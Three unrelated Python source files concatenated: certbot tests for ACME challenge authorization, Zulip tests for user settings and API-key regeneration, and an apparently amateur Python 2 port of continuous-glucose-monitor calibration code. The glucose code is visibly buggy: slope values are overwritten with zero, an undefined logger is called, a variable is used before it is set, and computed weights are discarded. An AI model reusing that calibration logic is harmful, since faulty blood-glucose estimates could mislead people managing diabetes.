def test_name1_tls_sni_01_1(self, mock_poll):
self.mock_net.request_domain_challenges.side_effect = functools.partial(
gen_dom_authzr, challs=acme_util.CHALLENGES)
mock_poll.side_effect = self._validate_all
authzr = self.handler.get_authorizations(["0"])
self.assertEqual(self.mock_net.answer_challenge.call_count, 1)
self.assertEqual(mock_poll.call_count, 1)
chall_update = mock_poll.call_args[0][0]
self.assertEqual(chall_update.keys(), ["0"])
self.assertEqual(len(chall_update.values()), 1)
self.assertEqual(self.mock_auth.cleanup.call_count, 1)
# Test if list first element is TLSSNI01, use typ because it is an achall
self.assertEqual(
self.mock_auth.cleanup.call_args[0][0][0].typ, "tls-sni-01")
self.assertEqual(len(authzr), 1)
@mock.patch("certbot.auth_handler.AuthHandler._poll_challenges")
def test_name1_tls_sni_01_1_http_01_1_dns_1(self, mock_poll):
self.mock_net.request_domain_challenges.side_effect = functools.partial(
gen_dom_authzr, challs=acme_util.CHALLENGES, combos=False)
mock_poll.side_effect = self._validate_all
self.mock_auth.get_chall_pref.return_value.append(challenges.HTTP01)
self.mock_auth.get_chall_pref.return_value.append(challenges.DNS)
authzr = self.handler.get_authorizations(["0"])
self.assertEqual(self.mock_net.answer_challenge.call_count, 3)
self.assertEqual(mock_poll.call_count, 1)
chall_update = mock_poll.call_args[0][0]
self.assertEqual(chall_update.keys(), ["0"])
self.assertEqual(len(chall_update.values()), 1)
self.assertEqual(self.mock_auth.cleanup.call_count, 1)
# Test if list first element is TLSSNI01, use typ because it is an achall
for achall in self.mock_auth.cleanup.call_args[0][0]:
self.assertTrue(achall.typ in ["tls-sni-01", "http-01", "dns"])
# Length of authorizations list
self.assertEqual(len(authzr), 1)
@mock.patch("certbot.auth_handler.AuthHandler._poll_challenges")
def test_name3_tls_sni_01_3(self, mock_poll):
self.mock_net.request_domain_challenges.side_effect = functools.partial(
gen_dom_authzr, challs=acme_util.CHALLENGES)
mock_poll.side_effect = self._validate_all
authzr = self.handler.get_authorizations(["0", "1", "2"])
self.assertEqual(self.mock_net.answer_challenge.call_count, 3)
# Check poll call
self.assertEqual(mock_poll.call_count, 1)
chall_update = mock_poll.call_args[0][0]
self.assertEqual(len(chall_update.keys()), 3)
self.assertTrue("0" in chall_update.keys())
self.assertEqual(len(chall_update["0"]), 1)
self.assertTrue("1" in chall_update.keys())
self.assertEqual(len(chall_update["1"]), 1)
self.assertTrue("2" in chall_update.keys())
self.assertEqual(len(chall_update["2"]), 1)
self.assertEqual(self.mock_auth.cleanup.call_count, 1)
self.assertEqual(len(authzr), 3)
def test_perform_failure(self):
self.mock_net.request_domain_challenges.side_effect = functools.partial(
gen_dom_authzr, challs=acme_util.CHALLENGES)
self.mock_auth.perform.side_effect = errors.AuthorizationError
self.assertRaises(
errors.AuthorizationError, self.handler.get_authorizations, ["0"])
def test_no_domains(self):
self.assertRaises(errors.AuthorizationError, self.handler.get_authorizations, [])
def _validate_all(self, unused_1, unused_2):
for dom in self.handler.authzr.keys():
azr = self.handler.authzr[dom]
self.handler.authzr[dom] = acme_util.gen_authzr(
messages.STATUS_VALID,
dom,
[challb.chall for challb in azr.body.challenges],
[messages.STATUS_VALID] * len(azr.body.challenges),
azr.body.combinations)
class PollChallengesTest(unittest.TestCase):
# pylint: disable=protected-access
"""Test poll challenges."""
def setUp(self):
from certbot.auth_handler import challb_to_achall
from certbot.auth_handler import AuthHandler
# Account and network are mocked...
self.mock_net = mock.MagicMock()
self.handler = AuthHandler(
None, self.mock_net, mock.Mock(key="mock_key"))
self.doms = ["0", "1", "2"]
self.handler.authzr[self.doms[0]] = acme_util.gen_authzr(
messages.STATUS_PENDING, self.doms[0],
[acme_util.HTTP01, acme_util.TLSSNI01],
[messages.STATUS_PENDING] * 2, False)
self.handler.authzr[self.doms[1]] = acme_util.gen_authzr(
messages.STATUS_PENDING, self.doms[1],
acme_util.CHALLENGES, [messages.STATUS_PENDING] * 3, False)
self.handler.authzr[self.doms[2]] = acme_util.gen_authzr(
messages.STATUS_PENDING, self.doms[2],
acme_util.CHALLENGES, [messages.STATUS_PENDING] * 3, False)
self.chall_update = {}
for dom in self.doms:
self.chall_update[dom] = [
challb_to_achall(challb, mock.Mock(key="dummy_key"), dom)
for challb in self.handler.authzr[dom].body.challenges]
@mock.patch("certbot.auth_handler.time")
def test_poll_challenges(self, unused_mock_time):
self.mock_net.poll.side_effect = self._mock_poll_solve_one_valid
self.handler._poll_challenges(self.chall_update, False)
for authzr in self.handler.authzr.values():
self.assertEqual(authzr.body.status, messages.STATUS_VALID)
@mock.patch("certbot.auth_handler.time")
def test_poll_challenges_failure_best_effort(self, unused_mock_time):
self.mock_net.poll.side_effect = self._mock_poll_solve_one_invalid
self.handler._poll_challenges(self.chall_update, True)
for authzr in self.handler.authzr.values():
self.assertEqual(authzr.body.status, messages.STATUS_PENDING)
@mock.patch("certbot.auth_handler.time")
@mock.patch("certbot.auth_handler.zope.component.getUtility")
def test_poll_challenges_failure(self, unused_mock_time, unused_mock_zope):
self.mock_net.poll.side_effect = self._mock_poll_solve_one_invalid
self.assertRaises(
errors.AuthorizationError, self.handler._poll_challenges,
self.chall_update, False)
@mock.patch("certbot.auth_handler.time")
def test_unable_to_find_challenge_status(self, unused_mock_time):
from certbot.auth_handler import challb_to_achall
self.mock_net.poll.side_effect = self._mock_poll_solve_one_valid
self.chall_update[self.doms[0]].append(
challb_to_achall(acme_util.DNS_P, "key", self.doms[0]))
self.assertRaises(
errors.AuthorizationError, self.handler._poll_challenges,
self.chall_update, False)
def test_verify_authzr_failure(self):
self.assertRaises(
errors.AuthorizationError, self.handler.verify_authzr_complete)
def _mock_poll_solve_one_valid(self, authzr):
# Pending here because my dummy script won't change the full status.
# Basically it didn't raise an error and it stopped earlier than
# Making all challenges invalid which would make mock_poll_solve_one
# change authzr to invalid
return self._mock_poll_solve_one_chall(authzr, messages.STATUS_VALID)
def _mock_poll_solve_one_invalid(self, authzr):
return self._mock_poll_solve_one_chall(authzr, messages.STATUS_INVALID)
def _mock_poll_solve_one_chall(self, authzr, desired_status):
# pylint: disable=no-self-use
"""Dummy method that solves one chall at a time to desired_status.
When all are solved.. it changes authzr.status to desired_status
"""
new_challbs = authzr.body.challenges
for challb in authzr.body.challenges:
if challb.status != desired_status:
new_challbs = tuple(
challb_temp if challb_temp != challb
else acme_util.chall_to_challb(challb.chall, desired_status)
for challb_temp in authzr.body.challenges
)
break
if all(test_challb.status == desired_status
for test_challb in new_challbs):
status_ = desired_status
else:
status_ = authzr.body.status
new_authzr = messages.AuthorizationResource(
uri=authzr.uri,
new_cert_uri=authzr.new_cert_uri,
body=messages.Authorization(
identifier=authzr.body.identifier,
challenges=new_challbs,
combinations=authzr.body.combinations,
status=status_,
),
)
return (new_authzr, "response")
class ChallbToAchallTest(unittest.TestCase):
"""Tests for certbot.auth_handler.challb_to_achall."""
def _call(self, challb):
from certbot.auth_handler import challb_to_achall
return challb_to_achall(challb, "account_key", "domain")
def test_it(self):
self.assertEqual(
self._call(acme_util.HTTP01_P),
achallenges.KeyAuthorizationAnnotatedChallenge(
challb=acme_util.HTTP01_P, account_key="account_key",
domain="domain"),
)
class GenChallengePathTest(unittest.TestCase):
"""Tests for certbot.auth_handler.gen_challenge_path.
.. todo:: Add more tests for dumb_path... depending on what we want to do.
"""
def setUp(self):
logging.disable(logging.fatal)
def tearDown(self):
logging.disable(logging.NOTSET)
@classmethod
def _call(cls, challbs, preferences, combinations):
from certbot.auth_handler import gen_challenge_path
return gen_challenge_path(challbs, preferences, combinations)
def test_common_case(self):
"""Given TLSSNI01 and HTTP01 with appropriate combos."""
challbs = (acme_util.TLSSNI01_P, acme_util.HTTP01_P)
prefs = [challenges.TLSSNI01, challenges.HTTP01]
combos = ((0,), (1,))
# Smart then trivial dumb path test
self.assertEqual(self._call(challbs, prefs, combos), (0,))
self.assertTrue(self._call(challbs, prefs, None))
# Rearrange order...
self.assertEqual(self._call(challbs[::-1], prefs, combos), (1,))
self.assertTrue(self._call(challbs[::-1], prefs, None))
def test_not_supported(self):
challbs = (acme_util.DNS_P, acme_util.TLSSNI01_P)
prefs = [challenges.TLSSNI01]
combos = ((0, 1),)
# smart path fails because no challs in perfs satisfies combos
self.assertRaises(
errors.AuthorizationError, self._call, challbs, prefs, combos)
# dumb path fails because all challbs are not supported
self.assertRaises(
errors.AuthorizationError, self._call, challbs, prefs, None)
class ReportFailedChallsTest(unittest.TestCase):
"""Tests for certbot.auth_handler._report_failed_challs."""
# pylint: disable=protected-access
def setUp(self):
kwargs = {
"chall": acme_util.HTTP01,
"uri": "uri",
"status": messages.STATUS_INVALID,
"error": messages.Error(typ="urn:acme:error:tls", detail="detail"),
}
# Prevent future regressions if the error type changes
self.assertTrue(kwargs["error"].description is not None)
self.http01 = achallenges.KeyAuthorizationAnnotatedChallenge(
# pylint: disable=star-args
challb=messages.ChallengeBody(**kwargs),
domain="example.com",
account_key="key")
kwargs["chall"] = acme_util.TLSSNI01
self.tls_sni_same = achallenges.KeyAuthorizationAnnotatedChallenge(
# pylint: disable=star-args
challb=messages.ChallengeBody(**kwargs),
domain="example.com",
account_key="key")
kwargs["error"] = messages.Error(typ="dnssec", detail="detail")
self.tls_sni_diff = achallenges.KeyAuthorizationAnnotatedChallenge(
# pylint: disable=star-args
challb=messages.ChallengeBody(**kwargs),
domain="foo.bar",
account_key="key")
@mock.patch("certbot.auth_handler.zope.component.getUtility")
def test_same_error_and_domain(self, mock_zope):
from certbot import auth_handler
auth_handler._report_failed_challs([self.http01, self.tls_sni_same])
call_list = mock_zope().add_message.call_args_list
self.assertTrue(len(call_list) == 1)
self.assertTrue("Domain: example.com\nType: tls\nDetail: detail" in call_list[0][0][0])
@mock.patch("certbot.auth_handler.zope.component.getUtility")
def test_different_errors_and_domains(self, mock_zope):
from certbot import auth_handler
auth_handler._report_failed_challs([self.http01, self.tls_sni_diff])
self.assertTrue(mock_zope().add_message.call_count == 2)
def gen_auth_resp(chall_list):
"""Generate a dummy authorization response."""
return ["%s%s" % (chall.__class__.__name__, chall.domain)
for chall in chall_list]
def gen_dom_authzr(domain, unused_new_authzr_uri, challs, combos=True):
"""Generates new authzr for domains."""
return acme_util.gen_authzr(
messages.STATUS_PENDING, domain, challs,
[messages.STATUS_PENDING] * len(challs), combos)
if __name__ == "__main__":
unittest.main() # pragma: no cover
|
|
from __future__ import absolute_import
from __future__ import print_function
import ujson
from django.http import HttpResponse
from mock import patch
from typing import Any, Dict
from zerver.lib.initial_password import initial_password
from zerver.lib.sessions import get_session_dict_user
from zerver.lib.test_classes import ZulipTestCase
from zerver.models import get_user_profile_by_email
class ChangeSettingsTest(ZulipTestCase):
def check_well_formed_change_settings_response(self, result):
# type: (Dict[str, Any]) -> None
self.assertIn("full_name", result)
# DEPRECATED, to be deleted after all uses of check_for_toggle_param
# are converted into check_for_toggle_param_patch.
def check_for_toggle_param(self, pattern, param):
# type: (str, str) -> None
self.login("hamlet@zulip.com")
user_profile = get_user_profile_by_email("hamlet@zulip.com")
json_result = self.client_post(pattern,
{param: ujson.dumps(True)})
self.assert_json_success(json_result)
# refetch user_profile object to correctly handle caching
user_profile = get_user_profile_by_email("hamlet@zulip.com")
self.assertEqual(getattr(user_profile, param), True)
json_result = self.client_post(pattern,
{param: ujson.dumps(False)})
self.assert_json_success(json_result)
# refetch user_profile object to correctly handle caching
user_profile = get_user_profile_by_email("hamlet@zulip.com")
self.assertEqual(getattr(user_profile, param), False)
# TODO: requires method consolidation, right now, there's no alternative
# for check_for_toggle_param for PATCH.
def check_for_toggle_param_patch(self, pattern, param):
# type: (str, str) -> None
self.login("hamlet@zulip.com")
user_profile = get_user_profile_by_email("hamlet@zulip.com")
json_result = self.client_patch(pattern,
{param: ujson.dumps(True)})
self.assert_json_success(json_result)
# refetch user_profile object to correctly handle caching
user_profile = get_user_profile_by_email("hamlet@zulip.com")
self.assertEqual(getattr(user_profile, param), True)
json_result = self.client_patch(pattern,
{param: ujson.dumps(False)})
self.assert_json_success(json_result)
# refetch user_profile object to correctly handle caching
user_profile = get_user_profile_by_email("hamlet@zulip.com")
self.assertEqual(getattr(user_profile, param), False)
def test_successful_change_settings(self):
# type: () -> None
"""
A call to /json/settings/change with valid parameters changes the user's
settings correctly and returns correct values.
"""
self.login("hamlet@zulip.com")
json_result = self.client_post(
"/json/settings/change",
dict(
full_name='Foo Bar',
old_password=initial_password('hamlet@zulip.com'),
new_password='foobar1',
confirm_password='foobar1',
))
self.assert_json_success(json_result)
result = ujson.loads(json_result.content)
self.check_well_formed_change_settings_response(result)
self.assertEqual(get_user_profile_by_email("hamlet@zulip.com").
full_name, "Foo Bar")
self.client_post('/accounts/logout/')
self.login("hamlet@zulip.com", "foobar1")
user_profile = get_user_profile_by_email('hamlet@zulip.com')
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_illegal_name_changes(self):
# type: () -> None
email = 'hamlet@zulip.com'
self.login(email)
user = get_user_profile_by_email(email)
full_name = user.full_name
with self.settings(NAME_CHANGES_DISABLED=True):
json_result = self.client_post("/json/settings/change",
dict(full_name='Foo Bar'))
# We actually fail silently here, since this only happens if
# somebody is trying to game our API, and there's no reason to
# give them the courtesy of an error reason.
self.assert_json_success(json_result)
user = get_user_profile_by_email(email)
self.assertEqual(user.full_name, full_name)
# Now try a too-long name
json_result = self.client_post("/json/settings/change",
dict(full_name='x' * 1000))
self.assert_json_error(json_result, 'Name too long!')
def test_illegal_characters_in_name_changes(self):
# type: () -> None
email = 'hamlet@zulip.com'
self.login(email)
# Now try a name with invalid characters
json_result = self.client_post("/json/settings/change",
dict(full_name='Opheli*'))
self.assert_json_error(json_result, 'Invalid characters in name!')
# This is basically a don't-explode test.
def test_notify_settings(self):
# type: () -> None
self.check_for_toggle_param_patch("/json/settings/notifications", "enable_desktop_notifications")
self.check_for_toggle_param_patch("/json/settings/notifications", "enable_stream_desktop_notifications")
self.check_for_toggle_param_patch("/json/settings/notifications", "enable_stream_sounds")
self.check_for_toggle_param_patch("/json/settings/notifications", "enable_sounds")
self.check_for_toggle_param_patch("/json/settings/notifications", "enable_offline_email_notifications")
self.check_for_toggle_param_patch("/json/settings/notifications", "enable_offline_push_notifications")
self.check_for_toggle_param_patch("/json/settings/notifications", "enable_online_push_notifications")
self.check_for_toggle_param_patch("/json/settings/notifications", "enable_digest_emails")
self.check_for_toggle_param_patch("/json/settings/notifications", "pm_content_in_desktop_notifications")
def test_ui_settings(self):
# type: () -> None
self.check_for_toggle_param_patch("/json/settings/ui", "autoscroll_forever")
self.check_for_toggle_param_patch("/json/settings/ui", "default_desktop_notifications")
def test_toggling_left_side_userlist(self):
# type: () -> None
self.check_for_toggle_param_patch("/json/settings/display", "left_side_userlist")
def test_toggling_emoji_alt_code(self):
# type: () -> None
self.check_for_toggle_param_patch("/json/settings/display", "emoji_alt_code")
def test_time_setting(self):
# type: () -> None
self.check_for_toggle_param_patch("/json/settings/display", "twenty_four_hour_time")
def test_enter_sends_setting(self):
# type: () -> None
self.check_for_toggle_param('/json/users/me/enter-sends', "enter_sends")
def test_mismatching_passwords(self):
# type: () -> None
"""
new_password and confirm_password must match
"""
self.login("hamlet@zulip.com")
result = self.client_post(
"/json/settings/change",
dict(
new_password="mismatched_password",
confirm_password="not_the_same",
))
self.assert_json_error(result,
"New password must match confirmation password!")
def test_wrong_old_password(self):
# type: () -> None
"""
new_password and confirm_password must match
"""
self.login("hamlet@zulip.com")
result = self.client_post(
"/json/settings/change",
dict(
old_password='bad_password',
new_password="ignored",
confirm_password="ignored",
))
self.assert_json_error(result, "Wrong password!")
def test_changing_nothing_returns_error(self):
# type: () -> None
"""
We need to supply at least one non-empty parameter
to this API, or it should fail. (Eventually, we should
probably use a patch interface for these changes.)
"""
self.login("hamlet@zulip.com")
result = self.client_post("/json/settings/change",
dict(old_password='ignored',))
self.assert_json_error(result, "No new data supplied")
def test_change_default_language(self):
# type: () -> None
"""
Test changing the default language of the user.
"""
email = "hamlet@zulip.com"
self.login(email)
german = "de"
data = dict(default_language=ujson.dumps(german))
result = self.client_patch("/json/settings/display", data)
self.assert_json_success(result)
user_profile = get_user_profile_by_email(email)
self.assertEqual(user_profile.default_language, german)
# Test to make sure invalid languages are not accepted
# and saved in the db.
invalid_lang = "invalid_lang"
data = dict(default_language=ujson.dumps(invalid_lang))
result = self.client_patch("/json/settings/display", data)
self.assert_json_error(result, "Invalid language '%s'" % (invalid_lang,))
user_profile = get_user_profile_by_email(email)
self.assertNotEqual(user_profile.default_language, invalid_lang)
class UserChangesTest(ZulipTestCase):
def test_update_api_key(self):
# type: () -> None
email = "hamlet@zulip.com"
self.login(email)
user = get_user_profile_by_email(email)
old_api_key = user.api_key
result = self.client_post('/json/users/me/api_key/regenerate')
self.assert_json_success(result)
new_api_key = ujson.loads(result.content)['api_key']
self.assertNotEqual(old_api_key, new_api_key)
user = get_user_profile_by_email(email)
self.assertEqual(new_api_key, user.api_key)
|
|
#!/usr/bin/python
import json
import socket
import sys
import time
import os
import array
import math
#import BGReadings
import sensor
from calibration import *
from linreg import *
BESTOFFSET = (60000 * 0) # Assume readings are about x minutes off from actual!
def getTimeDelta(BRReading,CurSensor):
return ((BRReading.timestamp-CurSensor['started_at'])*1.0)/1000/60/60
##########################################################
# calculateAgeAdjustedRawValue(hourssince, raw_data)
# As Name say calculates the age adjusted RawValue
#
def calculateAgeAdjustedRawValue(hourssince, raw_data):
adjust_for = (86400000 * 1.9) - (hourssince*60*60*1000)
#print "Adjust for -> " + str(adjust_for)
if adjust_for > 0:
age_adjusted_raw_value = (((.45) * (adjust_for / (86400000 * 1.9))) * raw_data) + raw_data
#print "RAW VALUE ADJUSTMENT: FROM:" + str(raw_data) + " TO: " + str(age_adjusted_raw_value)
return age_adjusted_raw_value
else:
#print "RAW VALUE ADJUSTMENT: FROM:" + str(raw_data) + " TO: " + str(raw_data)
return raw_data
##########################################################
# calcCGMVAL(slope,intercept,BG_raw):
# Calc CGm Value from RAW
# needs Calibrationdata slope intercept and BG_RAW Value
# gives back calibration corrected BG
def calcCGMVAL(slope,intercept,raw_data):
print "(calcCGMVAL) xdrip raw_data -> " + str(raw_data/1000)
print "(calcCGMVAL) xdrip slope -> " + str(slope)
print "(calcCGMVAL) xdrip intercept -> " + str(intercept)
bg=(((slope*1.0))*(raw_data*1.0/1000))+(intercept*1.0)
print "(calcCGMVAL) xdrip BG -> " + str(bg)
#bg=0
return bg
# //*******INSTANCE METHODS***********//
def perform_calculations():
find_new_curve();
find_new_raw_curve();
find_slope();
def find_slope():
latest=BGReadings_Data()
latest.getlatest()
second_latest=BGReadings_Data()
second_latest.getsecondlatest()
if second_latest <> None:
y1 = latest.bg;
x1 = latest.timestamp;
y2 = second_latest.bg;
x2 = second_latest.timestamp;
if y1 == y2:
latest.calculated_value_slope = 0;
else:
latest.calculated_value_slope = (y2 - y1)/(x2 - x1);
latest.write2db();
if latest <> None:
latest.calculated_value_slope = 0;
latest.write2db();
else:
print "NO BG? COULDNT FIND SLOPE!"
def find_new_curve():
latest=BGReadings_Data()
latest.getlatest()
secondlatest=BGReadings_Data()
secondlatest.getsecondlatest()
thirdlatest=BGReadings_Data()
thirdlatest.getthirdlatest()
print "->" + str(thirdlatest.bg) + " " + str(secondlatest.bg) + " " + str(latest.bg)
if (thirdlatest.bg<>0 and secondlatest.bg<>0 and latest.bg<>0):
y3 = latest.bg;
x3 = latest.timestamp;
y2 = secondlatest.bg;
x2 = secondlatest.timestamp;
y1 = thirdlatest.bg;
x1 = thirdlatest.timestamp;
print "find_new_curve latest.bg ->" + str(y3)
print "find_new_curve latest.timestamp ->" + str(x3)
print "find_new_curve 2latest.bg ->" + str(y2)
print "find_new_curve 2latest.timestamp ->" + str(x2)
print "find_new_curve 3latest.bg ->" + str(y1)
print "find_new_curve 3latest.timestamp ->" + str(x1)
a = y1/((x1-x2)*(x1-x3)) + y2/((x2-x1)*(x2-x3))+ y3/((x3-x1)*(x3-x2));
b = (-y1*(x2+x3) / ((x1-x2)*(x1-x3)) -y2*(x1+x3)/((x2-x1)*(x2-x3))-y3*(x1+x2)/((x3-x1)*(x3-x2)));
c = (y1*x2*x3/((x1-x2)*(x1-x3))+y2*x1*x3/((x2-x1)*(x2-x3))+y3*x1*x2/((x3-x1)*(x3-x2)));
elif (thirdlatest.bg<>0 and secondlatest.bg<>0):
print "Not enough data to calculate parabolic rates - assume Linear"
y2 = latest.bg;
x2 = latest.timestamp;
y1 = secondlatest.bg;
x1 = secondlatest.timestamp;
if y1 == y2 or x1 == x2:
b = 0;
else:
b = (y2 - y1)/(x2 - x1);
a = 0;
c = -1 * ((latest.b * x1) - y1);
else:
print "Not enough data to calculate parabolic rates - assume static data"
a = 0;
b = 0;
c = latest.bg;
print ""+str(a)+"x^2 + "+str(b)+"x + "+str(c)
print "(find_new_curve) BG PARABOLIC RATES: "+str(a)+"x^2 + "+str(b)+"x + "+str(c)
latest.a = a
latest.b = b
latest.c = c
latest.write2db()
def estimated_bg(timestamp):
timestamp = timestamp + BESTOFFSET;
latest = BGReadings_Data()
latest.getlatest()
if (latest == None):
return 0;
else:
return (latest.a * timestamp * timestamp) + (latest.b * timestamp) + latest.c;
def estimated_raw_bg(timestamp):
timestamp = timestamp + BESTOFFSET;
estimate=0;
latest = BGReadings_Data()
latest.getlatest()
if (latest == None):
# Todo Was soll das ?
Log.i(TAG, "No data yet, assume perfect!");
estimate = 160;
else:
estimate = (latest.ra * timestamp * timestamp) + (latest.rb * timestamp) + latest.rc;
print "ESTIMATE RAW BG" + str(estimate)
return estimate;
def find_new_raw_curve():
CurSensor=sensor.currentSensor()
first_latest = BGReadings_Data()
first_latest.getlatest()
second_latest = BGReadings_Data()
second_latest.getsecondlatest()
third_latest = BGReadings_Data()
third_latest.getthirdlatest()
if third_latest.raw_value<>0:
y3 = 1.0 * calculateAgeAdjustedRawValue(getTimeDelta(first_latest,CurSensor),first_latest.raw_value)/1000
x3 = first_latest.timestamp;
y2 = calculateAgeAdjustedRawValue(getTimeDelta(second_latest,CurSensor),second_latest.raw_value)/1000;
x2 = second_latest.timestamp;
y1 = calculateAgeAdjustedRawValue(getTimeDelta(third_latest,CurSensor),third_latest.raw_value)/1000;
x1 = third_latest.timestamp;
print "x1->" + str(x1) + ", y1->" +str(y1) + ", "
print "x2->" + str(x2) + ", y2->" +str(y2) + ", "
print "x3->" + str(x3) + ", y3->" +str(y3) + ", "
first_latest.ra = y1/((x1-x2)*(x1-x3))+y2/((x2-x1)*(x2-x3))+y3/((x3-x1)*(x3-x2));
first_latest.rb = (-y1*(x2+x3)/((x1-x2)*(x1-x3))-y2*(x1+x3)/((x2-x1)*(x2-x3))-y3*(x1+x2)/((x3-x1)*(x3-x2)));
first_latest.rc = (y1*x2*x3/((x1-x2)*(x1-x3))+y2*x1*x3/((x2-x1)*(x2-x3))+y3*x1*x2/((x3-x1)*(x3-x2)));
print "RAW PARABOLIC RATES: "+str(first_latest.ra)+"x^2 + "+str(first_latest.rb)+"x + "+str(first_latest.rc)
first_latest.write2db();
elif second_latest.raw_value<>0:
y2 = calculateAgeAdjustedRawValue(getTimeDelta(first_latest,CurSensor),first_latest.raw_value);
x2 = first_latest.timestamp;
y1 = calculateAgeAdjustedRawValue(getTimeDelta(second_latest,CurSensor),second_latest.raw_value);
x1 = second_latest.timestamp;
if y1 == y2:
first_latest.rb = 0;
else:
first_latest.rb = (y2 - y1)/(x2 - x1);
first_latest.ra = 0;
first_latest.rc = -1 * ((first_latest.rb * x1) - y1);
print "Not enough data to calculate parabolic rates - assume Linear data"
print "RAW PARABOLIC RATES: "+str(first_latest.ra)+"x^2 + "+str(first_latest.rb)+"x + "+str(first_latest.rc)
first_latest.write2db();
else:
first_latest.ra = 0;
first_latest.rb = 0;
first_latest.rc = first_latest.age_adjusted_raw_value;
print "Not enough data to calculate parabolic rates - assume static data"
print "RAW PARABOLIC RATES: "+str(first_latest.ra)+"x^2 + "+str(first_latest.rb)+"x + "+str(first_latest.rc)
first_latest.write2db();
def weightedAverageRaw(timeA, timeB, calibrationTime, rawA, rawB):
relativeSlope = (rawB - rawA)/(timeB - timeA);
relativeIntercept = rawA - (relativeSlope * timeA);
return ((relativeSlope * calibrationTime) + relativeIntercept);
def ___calcCGMVAL(slope,BG_raw,intercept):
raw_data=calculateAgeAdjustedRawValue(66,BG_raw)
bg=(((slope*1.0)/1000)*(raw_data*1.0/1000))+(intercept*1.0)
print "xdrip raw_data ->" + str(raw_data/1000)
print "xdrip slope ->" + str(slope/1000)
print "xdrip intercept ->" + str(intercept)
print "xdrip BG ->" + str(bg)
return bg
def slopeOOBHandler(status):
# If the last slope was reasonable and reasonably close, use that, otherwise use a slope that may be a little steep, but its best to play it safe when uncertain
#calibration=calibration_Data()
#cdata = calibration.allForSensorInLastFourDays
#calib = calibration_Data()
#calib.getlatest();
# Status = 0 niedrig 1 hoch
#if(status == 0):
# if (len(cdata) == 3):
# if ((Math.abs(thisCalibration.bg - thisCalibration.estimate_bg_at_time_of_calibration) < 30) and (calibrations.get(1).possible_bad != null and calibrations.get(1).possible_bad == true)):
# return calibrations.get(1).slope;
# else:
# return Math.max(((-0.048) * (thisCalibration.sensor_age_at_time_of_estimation / (60000 * 60 * 24))) + 1.1, 1.08);
# elif (len(cdata) == 2):
# return Math.max(((-0.048) * (thisCalibration.sensor_age_at_time_of_estimation / (60000 * 60 * 24))) + 1.1, 1.15);
# else:
# return 1
#else:
# if (len(cdata) == 3):
# if ((Math.abs(thisCalibration.bg - thisCalibration.estimate_bg_at_time_of_calibration) < 30) and (calibrations.get(1).possible_bad != null and calibrations.get(1).possible_bad == true)):
# return calibrations.get(1).slope;
# else:
# return 1.3
# elif (len(cdata) == 2):
#
return 1.08;
def calculateWeight(sensor_age_at_time_of_estimation,slope_confidence,sensor_confidence):
calibration=calibration_Data()
calibration.getfirst()
firstTimeStarted = calibration.sensor_age_at_time_of_estimation
calibration.getlatest()
lastTimeStarted = calibration.sensor_age_at_time_of_estimation;
print "(calculateWeight) lastTimeStarted->" + str(lastTimeStarted) + " firstTimeStarted " + str(firstTimeStarted)
print "(calculateWeight) sensor_age_at_time_of_estimation " + str(sensor_age_at_time_of_estimation)
# HMM irgendwie gibt es da verschiedene Versionen
if (sensor_age_at_time_of_estimation<>firstTimeStarted and (lastTimeStarted - firstTimeStarted) > 0):
time_percentage = min(((sensor_age_at_time_of_estimation - firstTimeStarted) / (lastTimeStarted - firstTimeStarted)) / (.85), 1);
else:
time_percentage=1
time_percentage = (time_percentage + .01);
print "(calculateWeight) CALIBRATIONS TIME PERCENTAGE WEIGHT: " + str(time_percentage)
print "slope_confidence ->" + str(slope_confidence)
print "sensor_confidence ->" + str(sensor_confidence)
print "(calculateWeight) CALIBRATIONS WEIGHT: " + str(max((((((slope_confidence + sensor_confidence) * (time_percentage))) / 2) * 100), 1))
return max((((((slope_confidence + sensor_confidence) * (time_percentage))) / 2) * 100), 1);
#return 100.0
def calculate_w_l_s():
calibration=calibration_Data()
calibration.getlatest()
if calibration.sensorid<>0:
x_RAW=0.0
y_BG=0.0
lreg = linregression()
calibrations = calibration.allForSensorInLastFourDays() # 5 days was a bit much, dropped this to 4
# Also eigentlich kann der code hier nie durchkommen. Versteckter Hinweis bei der initial calibrierung werden bereits 2 objecte erzeugt.
if (len(calibrations) == 1):
calibration.slope = 1;
calibration.intercept = calibration.bg - (calibration.raw_value * calibration.slope);
else:
for c in calibrations:
sensor_age_at_time_of_estimation=c[2]
y_BG=c[4]
sensor_confidence=c[8]
slope_confidence=c[9]
x_Raw=c[14]/1000
print "y_BG ->" + str(y_BG)
print "x_Raw ->" + str(x_Raw)
weight = calculateWeight(sensor_age_at_time_of_estimation,slope_confidence,sensor_confidence);
lreg.newval(x_Raw,y_BG,100)
last_calibration = calibration_Data()
last_calibration.getlatest()
#w = ( calculateWeight(last_calibration.sensor_age_at_time_of_estimation,last_calibration.slope_confidence,last_calibration.sensor_confidence) * (len(c) * 0.14));
calibration.intercept = lreg.intercept ;
calibration.slope = lreg.slope;
print "(1) Calculated Calibration Slope: " + str(calibration.slope)
print "(1) Calculated Calibration intercept: " + str(calibration.intercept)
# TODO Denke hier ist einer der interessantesten Teile der Software.
if 1==1:
if ((len(calibrations) == 2 and calibration.slope < 0.90) or (calibration.slope < 0.85)):
# I have not seen a case where a value below 7.5 proved to be accurate but we should keep an eye on this
calibration.slope = slopeOOBHandler(0);
if(len(calibrations) > 2):
calibration.possible_bad = True
print "calibration.bg-> " + str(calibration.bg)
print "calibration.estimate_raw_at_time_of_calibration -> " + str(calibration.estimate_raw_at_time_of_calibration)
print "calibration.slope -> " + str(calibration.slope)
calibration.intercept = calibration.bg - ((calibration.estimate_raw_at_time_of_calibration*1.0/1000) * calibration.slope)
# CalibrationRequest.createOffset(calibration.bg, 25);
if ((len(calibrations) == 2 and calibration.slope > 1.3) or (calibration.slope > 1.4)):
calibration.slope = slopeOOBHandler(1);
if(len(calibrations) > 2):
calibration.possible_bad = True
print "(calibration.bg) ->" + str(calibration.bg)
# Hier ist eine Null drin !!!!
print "(calibration.estimate_raw_at_time_of_calibration) ->" + str(calibration.estimate_raw_at_time_of_calibration)
print "(calibration.slope) ->" + str(calibration.slope)
calibration.intercept = calibration.bg - ((calibration.estimate_raw_at_time_of_calibration*1.0/1000) * calibration.slope)
# CalibrationRequest.createOffset(calibration.bg, 25);
print "(2) Calculated Calibration Slope: " + str(calibration.slope)
print "(2) Calculated Calibration intercept: " + str(calibration.intercept)
calibration.save();
else:
print "NO Current active sensor found!!"
def create(bg):
calibration = calibration_Data();
#sens = sensor();
bgReading=BGReadings_Data()
bgReadingsec=BGReadings_Data()
if (sensor.SensorisActive()):
sens = sensor.currentSensor()
